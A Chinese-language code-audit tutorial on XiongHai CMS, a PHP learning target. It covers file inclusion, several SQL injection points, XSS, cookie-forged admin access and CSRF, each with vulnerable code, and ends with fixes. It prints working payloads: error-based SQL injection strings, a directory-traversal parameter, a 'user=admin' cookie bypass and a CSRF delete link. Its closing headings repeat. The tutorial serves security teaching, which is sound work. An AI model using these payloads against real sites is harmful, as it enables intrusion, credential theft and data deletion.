熊海CMS代码审计教学文档<\/h1>

一、审计环境准备<\/h2>
使用小皮面板搭建测试环境<\/li>
新建网站部署熊海CMS源码<\/li>
使用Seay源代码审计系统进行初步扫描<\/li> <\/ol>
二、目录结构分析<\/h2>
admin\/          -- 管理后台文件夹
css\/            -- 存放CSS的文件夹
files\/          -- 存放页面的文件夹
images\/         -- 存放图片的文件夹
inc\/            -- 网站配置文件文件夹
install\/        -- 网站安装文件夹
seacmseditor\/   -- 编辑器文件夹
template\/       -- 模板文件夹
upload\/         -- 上传功能文件夹
index.php       -- 网站首页
<\/code><\/pre>
三、漏洞类型及分析<\/h2>
1. 文件包含漏洞<\/h3>
漏洞文件<\/strong>：<\/p>

index.php<\/li>
admin\/index.php<\/li>
<\/ul>
漏洞代码<\/strong>：<\/p>
$file=<\/span>addslashes<\/span>($_GET['r'<\/span>]);
<\/span><\/span>$action=<\/span>$file==<\/span>''<\/span>?<\/span>'index'<\/span>:<\/span>$file;
<\/span><\/span>include<\/span>('files\/'<\/span>.<\/span>$action.<\/span>'.php'<\/span>);
<\/span><\/span><\/code><\/pre>漏洞分析<\/strong>：<\/p>

使用addslashes()转义输入，但对文件包含无效<\/li>
未限制包含文件路径，可目录穿越<\/li>
可包含任意.php文件<\/li>
<\/ol>
利用方式<\/strong>：<\/p>
?r=phpinfo       \/\/ 包含files\/phpinfo.php
?r=..\/phpinfo    \/\/ 包含根目录phpinfo.php
<\/code><\/pre>
2. SQL注入漏洞<\/h3>
(1) 后台登录注入<\/h4>
漏洞文件<\/strong>：admin\/files\/login.php<\/p>
漏洞代码<\/strong>：<\/p>
$user=<\/span>$_POST['user'<\/span>];
<\/span><\/span>$query =<\/span> "SELECT * FROM manage WHERE user='<\/span>$user<\/span>'"<\/span>;
<\/span><\/span>$result =<\/span> mysql_query<\/span>($query) or<\/span> die<\/span>('SQL语句有误:'<\/span>.<\/span>mysql_error<\/span>());
<\/span><\/span><\/code><\/pre>漏洞特点<\/strong>：<\/p>

未过滤用户输入<\/li>
开启mysql_error()错误显示<\/li>
报错注入可行<\/li>
密码字段使用MD5比对，无法万能密码<\/li>
<\/ol>
利用payload<\/strong>：<\/p>
1' or updatexml(1,concat((select concat(0x7e,password) from manage)),0) #
1' or updatexml(1,concat((select concat(0x7e,user) from manage)),0) #
<\/code><\/pre>
(2) 其他后台注入点<\/h4>
漏洞文件<\/strong>：<\/p>

admin\/files\/softlist.php<\/li>
admin\/files\/editlink.php<\/li>
<\/ul>
漏洞代码<\/strong>：<\/p>
$delete=<\/span>$_GET['delete'<\/span>];
<\/span><\/span>$query =<\/span> "DELETE FROM download WHERE id='<\/span>$delete<\/span>'"<\/span>;
<\/span><\/span><\/code><\/pre>(3) 前台注入<\/h4>
漏洞文件<\/strong>：files\/software.php<\/p>
漏洞代码<\/strong>：<\/p>
$id=<\/span>addslashes<\/span>($_GET['cid'<\/span>]);
<\/span><\/span>$query =<\/span> "SELECT * FROM download WHERE id='<\/span>$id<\/span>'"<\/span>;
<\/span><\/span><\/code><\/pre>特殊点<\/strong>：<\/p>

虽然使用addslashes()，但magic_quotes_gpc默认开启导致双转义失效<\/li>
仍可报错注入<\/li>
<\/ol>
利用payload<\/strong>：<\/p>
?r=content&cid=1%20or(updatexml(1,concat(0x7e,(select%20version()),0x7e),1))
<\/code><\/pre>
(4) 安装流程注入<\/h4>
漏洞文件<\/strong>：install\/index.php<\/p>
漏洞代码<\/strong>：<\/p>
$query =<\/span> "UPDATE manage SET user='<\/span>$user<\/span>',password='<\/span>$password<\/span>',name='<\/span>$user<\/span>'"<\/span>;
<\/span><\/span>@<\/span>mysql_query<\/span>($query) or<\/span> die<\/span>('修改错误:'<\/span>.<\/span>mysql_error<\/span>());
<\/span><\/span><\/code><\/pre>利用条件<\/strong>：<\/p>

需删除InstallLock.txt文件锁<\/li>
重新安装时在user处注入<\/li>
<\/ol>
利用payload<\/strong>：<\/p>
1' extractvalue(1,concat(0x7e,(select @@version),0x7e))#
<\/code><\/pre>
3. XSS漏洞<\/h3>
(1) 反射型XSS<\/h4>
漏洞文件<\/strong>：files\/contact.php<\/p>
漏洞代码<\/strong>：<\/p>
$page=<\/span>addslashes<\/span>($_GET['page'<\/span>]);
<\/span><\/span><?<\/span>php<\/span> echo<\/span> $page?><\/span>
<\/span><\/span><\/span><\/code><\/pre>利用payload<\/strong>：<\/p>

<\/code><\/pre>
(2) 存储型XSS<\/h4>
漏洞文件<\/strong>：admin\/files\/manageinfo.php<\/p>
漏洞代码<\/strong>：<\/p>
$user=<\/span>$_POST['user'<\/span>];
<\/span><\/span>$name=<\/span>$_POST['name'<\/span>];
<\/span><\/span>$query =<\/span> "UPDATE manage SET user='<\/span>$user<\/span>',name='<\/span>$name<\/span>'..."<\/span>;
<\/span><\/span><\/code><\/pre>利用payload<\/strong>：<\/p>

<\/code><\/pre>
4. 垂直越权<\/h3>
漏洞文件<\/strong>：inc\/checklogin.php<\/p>
漏洞代码<\/strong>：<\/p>
$user=<\/span>$_COOKIE['user'<\/span>];
<\/span><\/span>if<\/span> ($user==<\/span>""<\/span>){
<\/span><\/span>    header<\/span>("Location: ?r=login"<\/span>);
<\/span><\/span>    exit<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>利用方式<\/strong>：<\/p>

直接添加Cookie: user=admin<\/li>
无需密码即可访问后台<\/li>
<\/ol>
5. CSRF漏洞<\/h3>
漏洞文件<\/strong>：admin\/files\/wzlist.php<\/p>
漏洞代码<\/strong>：<\/p>
$delete=<\/span>$_GET['delete'<\/span>];
<\/span><\/span>if<\/span> ($delete<><\/span>""<\/span>){
<\/span><\/span>    $query =<\/span> "DELETE FROM content WHERE id='<\/span>$delete<\/span>'"<\/span>;
<\/span><\/span>    $result =<\/span> mysql_query<\/span>($query);
<\/span><\/span>    echo<\/span> "<script>alert('亲,ID为"<\/span>.<\/span>$delete.<\/span>"的内容已经成功删除!');location.href='?r=wzlist'<\/script>"<\/span>;
<\/span><\/span>    exit<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>利用方式<\/strong>：<\/p>

构造恶意链接：www.xionghai.com\/admin\/?r=wzlist&delete=18<\/code><\/li>
诱骗管理员访问（需配合管理员Cookie）<\/li>
<\/ol>
四、漏洞修复建议<\/h2>


文件包含<\/strong>：<\/p>

限制包含文件路径<\/li>
使用白名单机制<\/li>
禁用动态包含<\/li>
<\/ul>
<\/li>

SQL注入<\/strong>：<\/p>

使用预处理语句<\/li>
过滤特殊字符<\/li>
关闭错误回显<\/li>
<\/ul>
<\/li>

XSS漏洞<\/strong>：<\/p>

输出时使用htmlspecialchars()<\/li>
输入时过滤特殊字符<\/li>
<\/ul>
<\/li>

越权漏洞<\/strong>：<\/p>

实现完整的会话验证机制<\/li>
使用CSRF Token<\/li>
<\/ul>
<\/li>

CSRF漏洞<\/strong>：<\/p>

添加CSRF Token验证<\/li>
检查Referer头<\/li>
<\/ul>
<\/li>
<\/ol>
五、审计总结<\/h2>

该CMS适合初学者学习代码审计<\/li>
存在典型的安全漏洞：

未过滤用户输入<\/li>
缺乏权限验证<\/li>
错误处理不当<\/li>
<\/ul>
<\/li>
漏洞利用链完整，从前台到后台均有安全问题<\/li>
可作为代码审计入门案例学习<\/li>
<\/ol>
六、参考资源<\/h2>

https:\/\/blog.csdn.net\/qq_36869808\/article\/details\/84324747<\/li>
PHP安全编程手册<\/li>
OWASP Top 10安全风险<\/li>
<\/ol>
熊海CMS代码审计教学文档<\/h1>

三、漏洞类型及分析<\/h2>

2. SQL注入漏洞<\/h3>

3. XSS漏洞<\/h3>

六、参考资源<\/h2> https:\/\/blog.csdn.net\/qq_36869808\/article\/details\/84324747<\/li> PHP安全编程手册<\/li> OWASP Top 10安全风险<\/li> <\/ol>

六、参考资源<\/h2>

https:\/\/blog.csdn.net\/qq_36869808\/article\/details\/84324747<\/li>
PHP安全编程手册<\/li>
OWASP Top 10安全风险<\/li> <\/ol>
